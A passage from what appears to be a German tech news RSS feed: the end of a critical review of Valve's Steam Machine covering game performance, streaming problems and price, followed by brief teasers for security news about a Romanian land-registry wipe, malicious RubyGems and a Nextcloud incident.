<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a5e12062ff80"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/image_faeed5.png?w=1200" alt="Horizon Zero Dawn screenshot" class="wp-image-3194021" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Michael Crider / Foundry</p></div>



<p>Zeit, das Tempo zu erhöhen. Ich habe mein neues Lieblingsspiel aus diesem Jahr gestartet: <em>Dead as Disco</em>. Dabei handelt es sich um ein Spiel auf Basis der Unreal Engine 5, das kleine Arenen und jeweils nur etwa ein Dutzend Charaktere auf dem Bildschirm zeigt, dafür aber mit beeindruckenden Effekten aufwartet, um dem musikalischen Beat-’em-up-Gameplay zusätzliche Atmosphäre zu verleihen.</p>



<p>Es ist zudem ein hervorragendes Beispiel dafür, wie wichtig Stabilität und Laufruhe beim Gaming sind; schon ein paar Ruckler reichen aus, um den Groove zu stören. Dies war das erste Spiel, das bei 4K Schwierigkeiten hatte, wobei die Bildrate in den Bereich von 30–45 FPS abfiel und mich auf der Tanzfläche etwas weniger tödlich machte.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a5e12063065a"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/image_2b1921.png?w=1200" alt="Dead as Disco screenshot" class="wp-image-3194015" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Michael Crider / Foundry</p></div>



<p>Um eine ideale Mischung aus Grafik und Leistung zu erzielen, musste ich die Auflösung auf 1080p herunterstufen – eine echte Schande auf meinem schicken LG-OLED-Fernseher. Der erste Kompromiss, aber nicht der letzte. Das derzeitige „Schwergewicht“ in meiner Steam-Bibliothek ist, passenderweise, <em>Space Marine 2</em>. Dieser Titel aus dem Jahr 2024 strotzt nur so vor Echtzeit-Action, zeigt Hunderte von Kreaturen gleichzeitig auf dem Bildschirm und überwältigt einen regelrecht mit jeder grafischen Raffinesse. Bei den standardmäßigen automatischen Einstellungen schaffte es das Spiel gerade so, in der Intro-Mission 60 FPS zu erreichen.</p>



<p>Dann habe ich die Auflösung auf 4K erhöht, da die Einstellungen für die Steam Machine 1080p automatisch ausgewählt hatten. Was sich letztlich als die richtige Entscheidung herausstellte. Denn bei 4K sank die Bildrate auf etwa 15–20 FPS, was das Gameplay erheblich beeinträchtigte. Mit ein wenig Feineinstellung im Grafikmenü gelang es mir, die Bildrate auf etwa 30 FPS zu steigern … was immer noch nicht besonders gut ist, vor allem, wenn man am Multiplayer-Modus teilnehmen möchte. Also bleibt es bei 1080p.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a5e120630ca4"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/image_baa63b.png?w=1200" alt="Space Marine 2 screenshot" class="wp-image-3194022" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Auf diesem Screenshot zermalme ich nicht einmal irgendwelche Ketzer unter meinem autoritären Stiefel, und dennoch erreiche ich bei 4K nur 17 FPS. </p></figcaption></figure><p class="imageCredit">Michael Crider / Foundry</p></div>



<p>Diese Ergebnisse entsprechen in etwa meinen Erwartungen, wenn man die verfügbare Hardware berücksichtigt, die sich seit der <a href="https://www.pcwelt.de/article/2970712/valve-steam-machine-ankuendigung-specs-preis-release.html" target="_blank" rel="noreferrer noopener">Ankündigung</a> der Steam Machine aufgrund einer enttäuschenden Herabstufung auf Single-Channel-RAM sogar noch verschlechtert hat. Im Vergleich zur Konkurrenz liegt das Gerät in etwa auf dem Niveau der PS5, obwohl es in der Basisausstattung bei beiden etwas weniger als das Doppelte kostet.</p>



<p>Dies ist aus vielen Gründen kein direkter Vergleich – Steam übertrifft Playstation beispielsweise bei der Spielauswahl um eine Größenordnung. Aber fast doppelt so viel für eine ähnliche Leistung zu bezahlen, sieht nicht gut aus, wie man es auch dreht und wendet.</p>



<h2 class="wp-block-heading">Die negativen Aspekte: ein mittelmäßiges Mediengerät und Streaming-Gerät</h2>



<p>SteamOS ist großartig. Ich bin immer noch davon überzeugt, <a href="https://www.pcwelt.de/article/2572682/darum-muss-microsoft-steamos-fuerchten.html" target="_blank" rel="noreferrer noopener">dass es die Zukunft des PC-Gamings sein könnte</a>. Aber es steht auch immer noch ziemlich eindeutig auf der „PC“-Seite der Kluft zwischen PC und Konsole. Trotz jahrelanger Arbeit von Valve gibt es immer noch einige Schwachstellen, die behoben werden müssen.</p>



<p>Als ich beispielsweise meine Steam Machine an meinen Fernseher anschloss, erwartete ich, dass sie von Haus aus mit einem Surround-Sound-System funktionieren würde. Das tut sie auch irgendwie. Ich erhalte Ton aus den hinteren Lautsprechern, aber in keinem der von mir getesteten Spiele scheint tatsächlich eine Surround-Sound-Zuordnung zu erfolgen. Ich werfe also einen Blick in das SteamOS-Einstellungsmenü, und dort steht lediglich, dass der Ton über HDMI ausgegeben wird. Die individuellen Spieleinstellungen sind wenig hilfreich.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a5e120631552"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/image_397d57.png?w=1200" alt="Screenshot of Steam Machine sound settings menu" class="wp-image-3194023" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Michael Crider / Foundry</p></div>



<p>Das ist ein Problem, das ich wahrscheinlich mit etwas zusätzlichem Aufwand beheben könnte. Aber das sollte eigentlich nicht nötig sein – wenn Valve dieses Gerät als Gaming-Gerät für Ihr Wohnzimmer positioniert, sollte es automatisch funktionieren, vielleicht nach fünf Minuten der Feinabstimmung der Einstellungen. Bei der PS5 funktioniert das so. Und der Steam Machine fehlen einige der unverzichtbaren Tools für ein Gerät, das als Unterhaltungszentrum dienen soll. Ich kann beispielsweise weder Netflix noch Disney+ aufrufen, ohne zunächst einen Browser zu öffnen.</p>



<p>Das tendiert jedoch eher zur Konsolenseite. Ich habe mich daher entschlossen, den Fokus auf den PC-Gaming-Aspekt zu legen. Ich habe einen ziemlich leistungsstarken PC in meinem Büro, und SteamOS verfügt über eine direkt integrierte lokale Streaming-Funktion. Dieses Gerät kann <em>Space Marine 2 </em>mit voller Leistung ausführen und meinen 240-Hz-Monitor mit einer Auflösung von 3440 × 1440 problemlos voll auslasten. Warum also nicht einfach per Fernzugriff spielen?</p>



<p><a href="https://www.reddit.com/r/SteamDeck/comments/1fbt1tw/warhammer_40000_space_marine_2_remote_play_issues/" target="_blank" rel="noreferrer noopener">Weil es einen zwei Jahre alten Fehler gibt, </a>der das Streamen von <em>Space Marine 2 </em>über Steam verhindert, deshalb. Ich begann, das Spiel zu streamen, und es wurde standardmäßig auf die Ultrawide-Auflösung meines PCs eingestellt. Nicht ideal, aber das lässt sich auf verschiedene Weise beheben. Aber ich kann das Problem nicht beheben, wenn ich das Spiel nicht steuern kann. Und das kann ich nicht, da die Gamepad-Eingaben aus der Ferne einfach nicht funktionieren – und das schon seit der Veröffentlichung.</p>



<p>Dabei handelt es sich nicht um irgendein obskures Indie-Spiel, sondern um einen Riesenerfolg, dessen Multiplayer-Community nach wie vor stark genug ist, um regelmäßige Inhaltsupdates zu erhalten. Ich vermute, es spielen einfach nicht genug Leute auf diese Weise, als dass es eine Rolle spielen würde.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a5e120631d76"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/image_30b8e7.png?w=1200" alt="Space Marine II in Steam settings " class="wp-image-3194024" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Michael Crider / Foundry</p></div>



<p>Das Streamen anderer Spiele war, nun ja, machbar. Selbst ohne diesen lästigen Controller-Fehler (der eher bei den Spieleentwicklern als beim Gerät liegt) war es mühsam, andere Spiele von meinem Gaming-PC auf den Fernseher zu übertragen. Ich musste die Einstellungen viel sorgfältiger vornehmen; es gab keine Möglichkeit, die Auflösung auf volle 4K einzustellen, da meine Monitore maximal 1440p unterstützen, und die offensichtliche Latenz war für Spiele wie <em>Dead as Disco</em> nicht gerade vorteilhaft. Dies ist einfach keine optimale Art, PC-Spiele zu erleben, auch wenn es schön war, sie auf dem großen Bildschirm zu sehen.</p>



<p>Das ideale Steam-Machine-Spiel ist daher eines, das in Sachen 3D-Grafik nicht allzu hohe Anforderungen stellt. Und das ist ein vernichtendes Urteil für ein Produkt, das vorgibt, PC-Gaming ins Wohnzimmer zu bringen. </p>



<h2 class="wp-block-heading">Das Schlimmste: ein miserables Preis-Leistungs-Verhältnis</h2>



<p>Das große Tabuthema bei der Steam Machine war schon immer ihr Preis. Selbst bevor KI die PC-Hardware regelrecht in den Ruin trieb und wir noch davon ausgingen, dass der Preis irgendwo zwischen 600 und 900 Euro liegen würde – war das bereits eine stattliche Summe, sei es für eine Konsole oder einen Gaming-PC mittlerer Leistungsklasse. Bei einem Einstiegspreis von aktuell 1.039 Euro sieht das einfach schlecht aus.</p>



<p>Ich gehe davon aus, dass Valve jeden Cent eingespart hat, den es konnte, und es dennoch nicht geschafft hat, den Preis auf unter 1000 Euro zu senken. Es ist nicht Valves Schuld, dass das Jahr 2026 eine verwüstete Höllenlandschaft ist. Aber man kann normalen Käufern, die ohnehin schon zu kämpfen haben, nicht sagen, sie sollten das Marktgeschehen im größeren Zusammenhang betrachten. 1.000 Euro für einen Gaming-PC der Mittelklasse, der zudem für normale PC-Aufgaben nicht gut geeignet ist, <strong>sind kein gutes Angebot.</strong></p>



<p>Sicher, man könnte einen normalen Linux-Desktop darauf installieren, einen Browser einrichten und das Gerät wie einen gewöhnlichen PC nutzen. Aber warum sollte man das tun, wenn man für denselben Preis – oder sogar weniger – einen Windows-Rechner erhalten kann, der ebenso leistungsfähig ist?</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a5e120632691"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/11/image_e42d9e.png?w=1200" alt="PCPartPicker price trend DDR5 DRAM" class="wp-image-2973555" width="1200" height="562" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">PCPartPicker.com</p></div>



<p>Auch wenn ich mir sicher bin, dass Linux-Fans und überzeugte SteamOS-Anhänger dieses Argument gerne vorbringen würden, kann ich das für den Durchschnittsnutzer, der einfach nur ein paar Spiele spielen möchte, nicht nachvollziehen. Ich sage es ganz offen: Wenn Sie Videospiele spielen möchten und ganz von vorn anfangen, sind eine <a href="https://www.pcwelt.de/article/2522347/ps5-pro-praxis-test.html" target="_blank" rel="noreferrer noopener">Playstation 5 (Pro)</a> oder eine <a href="https://www.pcwelt.de/article/2809025/nintendo-switch-2-test-review.html" target="_blank" rel="noreferrer noopener">Switch 2</a> die bessere Wahl. Selbst wenn man die zahlreichen exklusiven Titel außer Acht lässt, ist dies einfacher und kostengünstiger, und der zusätzliche Aufwand, der mit SteamOS einhergeht, ist einfach abschreckend.</p>



<p>Für wen ist die Steam Machine also gedacht? Wenn man Valve beim Wort nimmt, ist die Steam Machine für jemanden gedacht, der über eine riesige Steam-Bibliothek verfügt und diese Spiele auf einfache Weise auf seinem Fernseher spielen möchte. Und dafür funktioniert sie … mit wichtigen Ausnahmen, wie zum Beispiel dem Spielen der neuesten Spiele in 4K. Und dafür zahlen Sie einen hohen Preis.</p>



<p><strong>Zum Vergleich:</strong> Mein aktueller Gaming-PC (7800X3D und 5070 Ti) würde heute etwa 2.300 Euro kosten, vielleicht 1.500 Euro, bevor dieser ganze KI-Unsinn den Markt in die Höhe getrieben hat. Und er kann <em>Space Marine 2 </em>mit etwa der vierfachen<em> </em>Leistung der Steam Machine spielen – zum 2,5-fachen Preis. Die Steam Machine bietet, wie man es auch dreht und wendet, <strong>ein schlechtes Preis-Leistungs-Verhältnis.</strong></p>



<h2 class="wp-block-heading">SteamOS ist der Star </h2>



<p>Trotz alledem bin ich in Bezug auf einen Aspekt der Steam Machine nach wie vor optimistisch: ihr Betriebssystem. Was vor einem Jahrzehnt bei den ursprünglichen Steam Machines noch ein Wunschtraum war, hat sich zu einer echten, auf Gaming ausgerichteten Linux-Version entwickelt, die auch für Mainstream-Nutzer zugänglich ist. Sie ist nicht in jeder Hinsicht perfekt ausgefeilt, aber das ist Windows ja auch nicht. Und diese Version wurde von Grund auf für das Gaming entwickelt.</p>



<p>Valve scheint mir zuzustimmen, da es nun möglich ist, offizielle Versionen von SteamOS auf selbstgebauten PCs zu installieren – ganz ohne „Bazzite“-Distributionen. Es gibt noch viel Unterstützung, die ausgebaut werden muss, vor allem bei Intel- und Nvidia-Hardware, aber auch daran wird bereits gearbeitet. Und da der Steam Frame bald auf den Markt kommt, sieht es so aus, als würde SteamOS auch auf ARM-basierte Hardware vorstoßen. Das ist wirklich spannend.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a5e120632e55"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/image_0bcad2.png?w=1200" alt="Steam Machine screenshot library " class="wp-image-3194025" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Michael Crider / Foundry</p></div>



<p>Allmählich taucht Gaming-PC-Hardware mit vorinstalliertem SteamOS auf, bei der Windows nirgends zu finden ist. Ein solches Gerät haben wir bereits von Lenovo, einem der größten PC-Hersteller der Welt, in Form des „Legion Go“ mit SteamOS erhalten. Es gibt Gerüchte, dass auch kleinere Unternehmen ähnliche Schritte unternehmen. Ich glaube jedoch, dass wir nur noch etwa ein Jahr davon entfernt sind, dass bei Amazon ein Gaming-Laptop mit einem Linux-Betriebssystem verkauft wird.</p>



<p><strong>In der Zwischenzeit würde ich sagen: Kaufen Sie die Steam Machine nicht.</strong> Es macht im Moment einfach keinen Sinn, aber auf diesem Markt ist sie in dieser Hinsicht kaum ein Einzelfall. Für die Art von Spielen, bei denen die Steam Machine glänzt, <a href="https://www.pcwelt.de/article/2826305/gaming-mit-mini-pcs-geht-das-diese-modelle-lohnen-sich.html" target="_blank" rel="noreferrer noopener">würde ich mir einen günstigeren Mini-PC zulegen und SteamOS darauf installieren</a>. Oder Sie lassen einfach Windows und Steam im Big-Picture-Modus laufen.</p>



<p><a href="https://www.pcwelt.de/article/2639709/nicht-wegwerfen-fuenf-geniale-ideen-fuer-alte-notebook-laptops-weiternutzung.html" target="_blank" rel="noreferrer noopener">Alternativ könnte ein Laptop, den Sie nicht nutzen</a>, wahrscheinlich denselben Zweck erfüllen. Wenn Sie einen Steam-Controller ergattern können, wären Sie schon fast am Ziel. Obwohl ein Xbox-Controller derzeit wahrscheinlich die realistischere Option ist.</p>



<p>Die Steam Machine ist spannend – wenn auch weniger wegen dem, was sie tatsächlich ist, als vielmehr wegen dem, wofür sie steht. Vielleicht verkaufe ich sie in ein paar Monaten, nachdem ich sie ausgiebig ausprobiert habe. Oder ich behalte sie einfach, um weiter zu verfolgen, was Valve mit SteamOS vorhat. Aber das gehört buchstäblich zu meinem Job. Für diejenigen, die einfach nur Spiele spielen möchten, würde ich empfehlen, diese Kaufgelegenheit lieber auszulassen.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hacker löscht Rumäniens gesamte Landregisterdatenbank – Stillstand im Immobilienmarkt]]></title>
<description><![CDATA[BUKAREST / LONDON (IT BOLTWISE) – Ein Hackerangriff hat in Rumänien die gesamte Datenbank des Landregisters gelöscht. Für rund eine Woche fielen offizielle Apps und Websites aus, Notare konnten keine neuen Immobiliengeschäfte mehr dokumentieren. Parallel verloren Bürger den Zugriff auf Eigentumsn...]]></description>
<link>https://tsecurity.de/de/3680912/it-security-nachrichten/hacker-loescht-rumaeniens-gesamte-landregisterdatenbank-stillstand-im-immobilienmarkt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680912/it-security-nachrichten/hacker-loescht-rumaeniens-gesamte-landregisterdatenbank-stillstand-im-immobilienmarkt/</guid>
<pubDate>Mon, 20 Jul 2026 12:54:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-romania-cadastre-land-registry-wipe.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-romania-cadastre-land-registry-wipe.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-romania-cadastre-land-registry-wipe-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-romania-cadastre-land-registry-wipe-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-romania-cadastre-land-registry-wipe-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-romania-cadastre-land-registry-wipe-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-romania-cadastre-land-registry-wipe-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">BUKAREST / LONDON (IT BOLTWISE) – Ein Hackerangriff hat in Rumänien die gesamte Datenbank des Landregisters gelöscht. Für rund eine Woche fielen offizielle Apps und Websites aus, Notare konnten keine neuen Immobiliengeschäfte mehr dokumentieren. Parallel verloren Bürger den Zugriff auf Eigentumsnachweise und detaillierte Grundstücksdaten. Entscheidend ist, dass der Angriff nicht nur Systeme betraf, sondern offenbar […]</p>
<div><a href="https://www.it-boltwise.de/hacker-loescht-rumaeniens-gesamte-landregisterdatenbank-stillstand-im-immobilienmarkt.html">... den vollständigen Artikel <strong>»Hacker löscht Rumäniens gesamte Landregisterdatenbank – Stillstand im Immobilienmarkt«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/hacker-loescht-rumaeniens-gesamte-landregisterdatenbank-stillstand-im-immobilienmarkt.html">Hacker löscht Rumäniens gesamte Landregisterdatenbank – Stillstand im Immobilienmarkt</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[SleeperGem: Drei bösartige RubyGems manipulieren Entwicklerrechner und Keys]]></title>
<description><![CDATA[BERLIN / LONDON (IT BOLTWISE) – Forschende haben die Supply-Chain-Attacke „SleeperGem“ im Ruby-Ökosystem identifiziert. Drei bösartige Gems wurden im RubyGems-Registry-Verzeichnis so platziert, dass beim Installieren zusätzliche Payloads nachgeladen werden. Die Malware prüft gezielt, ob sie auf e...]]></description>
<link>https://tsecurity.de/de/3680760/it-security-nachrichten/sleepergem-drei-boesartige-rubygems-manipulieren-entwicklerrechner-und-keys/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680760/it-security-nachrichten/sleepergem-drei-boesartige-rubygems-manipulieren-entwicklerrechner-und-keys/</guid>
<pubDate>Mon, 20 Jul 2026 11:54:14 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-sleepergem-rubygems-incident-response.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-sleepergem-rubygems-incident-response.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-sleepergem-rubygems-incident-response-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-sleepergem-rubygems-incident-response-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-sleepergem-rubygems-incident-response-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-sleepergem-rubygems-incident-response-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-sleepergem-rubygems-incident-response-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">BERLIN / LONDON (IT BOLTWISE) – Forschende haben die Supply-Chain-Attacke „SleeperGem“ im Ruby-Ökosystem identifiziert. Drei bösartige Gems wurden im RubyGems-Registry-Verzeichnis so platziert, dass beim Installieren zusätzliche Payloads nachgeladen werden. Die Malware prüft gezielt, ob sie auf einer echten Entwicklermaschine läuft und umgeht damit CI-Umgebungen. Besonders kritisch: betroffene Systeme müssen laut Analyse als kompromittiert gelten und […]</p>
<div><a href="https://www.it-boltwise.de/sleepergem-drei-boesartige-rubygems-manipulieren-entwicklerrechner-und-keys.html">... den vollständigen Artikel <strong>»SleeperGem: Drei bösartige RubyGems manipulieren Entwicklerrechner und Keys«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/sleepergem-drei-boesartige-rubygems-manipulieren-entwicklerrechner-und-keys.html">SleeperGem: Drei bösartige RubyGems manipulieren Entwicklerrechner und Keys</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Nextcloud: Da ist wohl etwas ganz Wildes passiert]]></title>
<description><![CDATA[Ganz wilde Geschichte bei Nextcloud. Gestern Nacht konnten Anwender beobachten, dass beim Aufrufen der Seite Nextcloud.com die Inhalte einer Cloudbox angezeigt wurden. Stunden später wurde die Seite in den Wartungsmodus versetzt. Wurde Nextcloud.com gehackt? Möglich ist es. Auch Google hat...Zum ...]]></description>
<link>https://tsecurity.de/de/3680694/it-nachrichten/nextcloud-da-ist-wohl-etwas-ganz-wildes-passiert/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680694/it-nachrichten/nextcloud-da-ist-wohl-etwas-ganz-wildes-passiert/</guid>
<pubDate>Mon, 20 Jul 2026 11:17:53 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
